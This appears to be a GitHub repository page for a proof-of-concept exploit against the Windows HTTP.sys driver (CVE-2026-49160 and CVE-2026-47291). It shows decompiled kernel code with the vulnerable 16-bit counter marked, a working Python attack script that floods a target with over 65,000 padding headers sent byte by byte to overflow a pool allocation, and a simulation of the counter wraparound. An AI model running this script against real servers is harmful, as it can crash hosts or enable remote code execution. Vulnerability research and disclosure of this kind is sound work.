dhmosfunk/CVE-2026-49160-CVE-2026-47291-HTTP.sys

GitHub: dhmosfunk/CVE-2026-49160-CVE-2026-47291-HTTP.sys

This project provides proof-of-concept code and reverse-engineering analysis for the Windows HTTP.sys kernel driver denial-of-service and remote code execution vulnerabilities (CVE-2026-49160 / CVE-2026-47291).

Stars: 0 | Forks: 0

# CVE-2026-49160 & CVE-2026-47291 HTTP.sys PoC

HTTP.sys Denial of Service Vulnerability \ HTTP.sys Remote Code Execution Vulnerability

Because of GitHub's file size limit, the demo video for this PoC (CVE-2026-49160) is hosted as an attachment under [Releases](../../releases).

# CVE-2026-47291

Vulnerable code (decompiler output):

```c
if ((DAT_0 & 1) != 0) {
    local_e8 = *(int **)(piVar16 + 0x10);
    local_e0 = (char *)ppuVar3;
    WPP_SF_qII(0x408,0x10b,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,piVar16);
}
if (*(ushort *)((longlong)piVar16 + 0x642) < *(ushort *)(piVar16 + 400)) {
LAB_8:
    ppuVar1 = ppuVar3 + 4;
    *(undefined ***)
     (*(longlong *)(piVar16 + 0x192) + (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) * 8) = ppuVar3;
    *(short *)((longlong)piVar16 + 0x642) = *(short *)((longlong)piVar16 + 0x642) + 1;
    LOCK();
    iVar10 = *(int *)ppuVar1;
    *(int *)ppuVar1 = *(int *)ppuVar1 + 1;
    UNLOCK();
    if ((UxDebugCheckRefcount != '\0') && (iVar10 + 1 < 0)) {
        UlBugCheckEx(3,ppuVar1,10,(longlong)(iVar10 + 1));
        pcVar4 = (code *)swi(3);
        (*pcVar4)();
        return;
    }
    cVar6 = '\x01';
}
else {
    local_e8 = (int *)CONCAT44(local_e8._4_4_,1);
    _Dst = (void *)ExAllocatePool3(0x42,(ulonglong)*(ushort *)(piVar16 + 400) * 8 + 0x28,
                                   0x52526c55,&UxLowPriorityPool);
    if (_Dst != (void *)0x0) {
        memmove(_Dst,*(void **)(piVar16 + 0x192),
                (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) << 3);
        if (1 < *(ushort *)(piVar16 + 400)) {
            ExFreePoolWithTag(*(undefined8 *)(piVar16 + 0x192),0);
        }
        *(short *)(piVar16 + 400) = (short)piVar16[400] + 5;   // <- unsigned short 16bit
        *(void **)(piVar16 + 0x192) = _Dst;
        goto LAB_8;
    }
}
if ((DAT_0 & 1) != 0) {
    WPP_SF_D(0x408,0x10c,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,cVar6);
}
```

The following code increases the counter value by +5:

```python
import socket, ssl, time

# TLS connection to the target, certificate checks disabled
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

raw_sock = socket.create_connection(("hello.lab", 443))
s = ctx.wrap_socket(raw_sock, server_hostname="hello.lab")
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

# one request carrying 0xFFFF+2 padding headers
request = b"GET / HTTP/1.1\r\nHost: hello.lab\r\nConnection: keep-alive\r\n"
for i in range(0xFFFF + 2):
    request += f"X-Pad-{i}: value{i}\r\n".encode()
request += b"\r\n"

# send the request one byte at a time
for b in request:
    s.send(bytes([b]))

try:
    response = s.recv(4096)
    print(response)
except ConnectionResetError as e:
    print("Connection reset:", e)

print("Connection held open. Press Ctrl+C to close.")
try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("Closing.")
    s.close()
```

Let the script run for about 30 minutes, since the counter grows by +5 for every buffer received...

The triggered overflow:

[image: triggered overflow]

The counter in the debugger:

[image: counter in the debugger]
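As an added illustration (not part of this repository), the Python model below replays the grow-on-full logic of the decompiled snippet: the capacity field is a 16-bit value that grows by 5 on every reallocation, so it eventually wraps to a small number and the next `ExAllocatePool3` block is far smaller than the `memmove` that fills it. The starting capacity of 1 and the 8-byte slot size are assumptions read from the snippet, not facts stated on the page.

```python
# Model of the header-table growth in the decompiled HTTP.sys snippet.
# Assumptions (not from the page): the table starts with capacity 1 and
# count 0; count (offset 0x642) and capacity (index 400) are the two
# 16-bit fields compared before each insert.
MASK16 = 0xFFFF
POOL_EXTRA = 0x28      # the "+ 0x28" in the ExAllocatePool3 size
ENTRY_SIZE = 8         # each table slot holds an 8-byte pointer
GROWTH = 5             # "(short)piVar16[400] + 5"


def simulate_header_table(n_headers, initial_capacity=1):
    """Replay the insert path for n_headers headers.

    Returns (header_index, alloc_size, copy_len) for the first header whose
    memmove would copy more bytes than the freshly allocated block holds,
    or None if no such header occurs within n_headers.
    """
    count = 0
    capacity = initial_capacity & MASK16
    for idx in range(1, n_headers + 1):
        if not (count < capacity):                 # table full: reallocate
            alloc_size = capacity * ENTRY_SIZE + POOL_EXTRA
            copy_len = count * ENTRY_SIZE          # memmove(..., count << 3)
            if copy_len > alloc_size:
                return idx, alloc_size, copy_len   # undersized block
            capacity = (capacity + GROWTH) & MASK16  # 16-bit store wraps
        count = (count + 1) & MASK16               # slot filled, count++
    return None


def headers_until_wrap(initial_capacity=1):
    """Number of reallocations until the 16-bit capacity field wraps to 0."""
    reallocs = 0
    capacity = initial_capacity & MASK16
    while True:
        capacity = (capacity + GROWTH) & MASK16
        reallocs += 1
        if capacity < GROWTH:                      # wrapped past 0xFFFF
            return reallocs


if __name__ == "__main__":
    print("reallocations until capacity wraps:", headers_until_wrap())
    print("first undersized allocation:", simulate_header_table(0xFFFF + 2))
```

With the assumed starting capacity the wrap happens on the 13107th reallocation, and the request in the PoC above (0xFFFF+2 headers) comfortably covers the header index at which the undersized block is allocated; a request with far fewer headers never reaches it.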
Tags: HTTP.sys, PoC, denial of service, brute force, programming tools, remote code execution, reverse-engineering tools, misconfiguration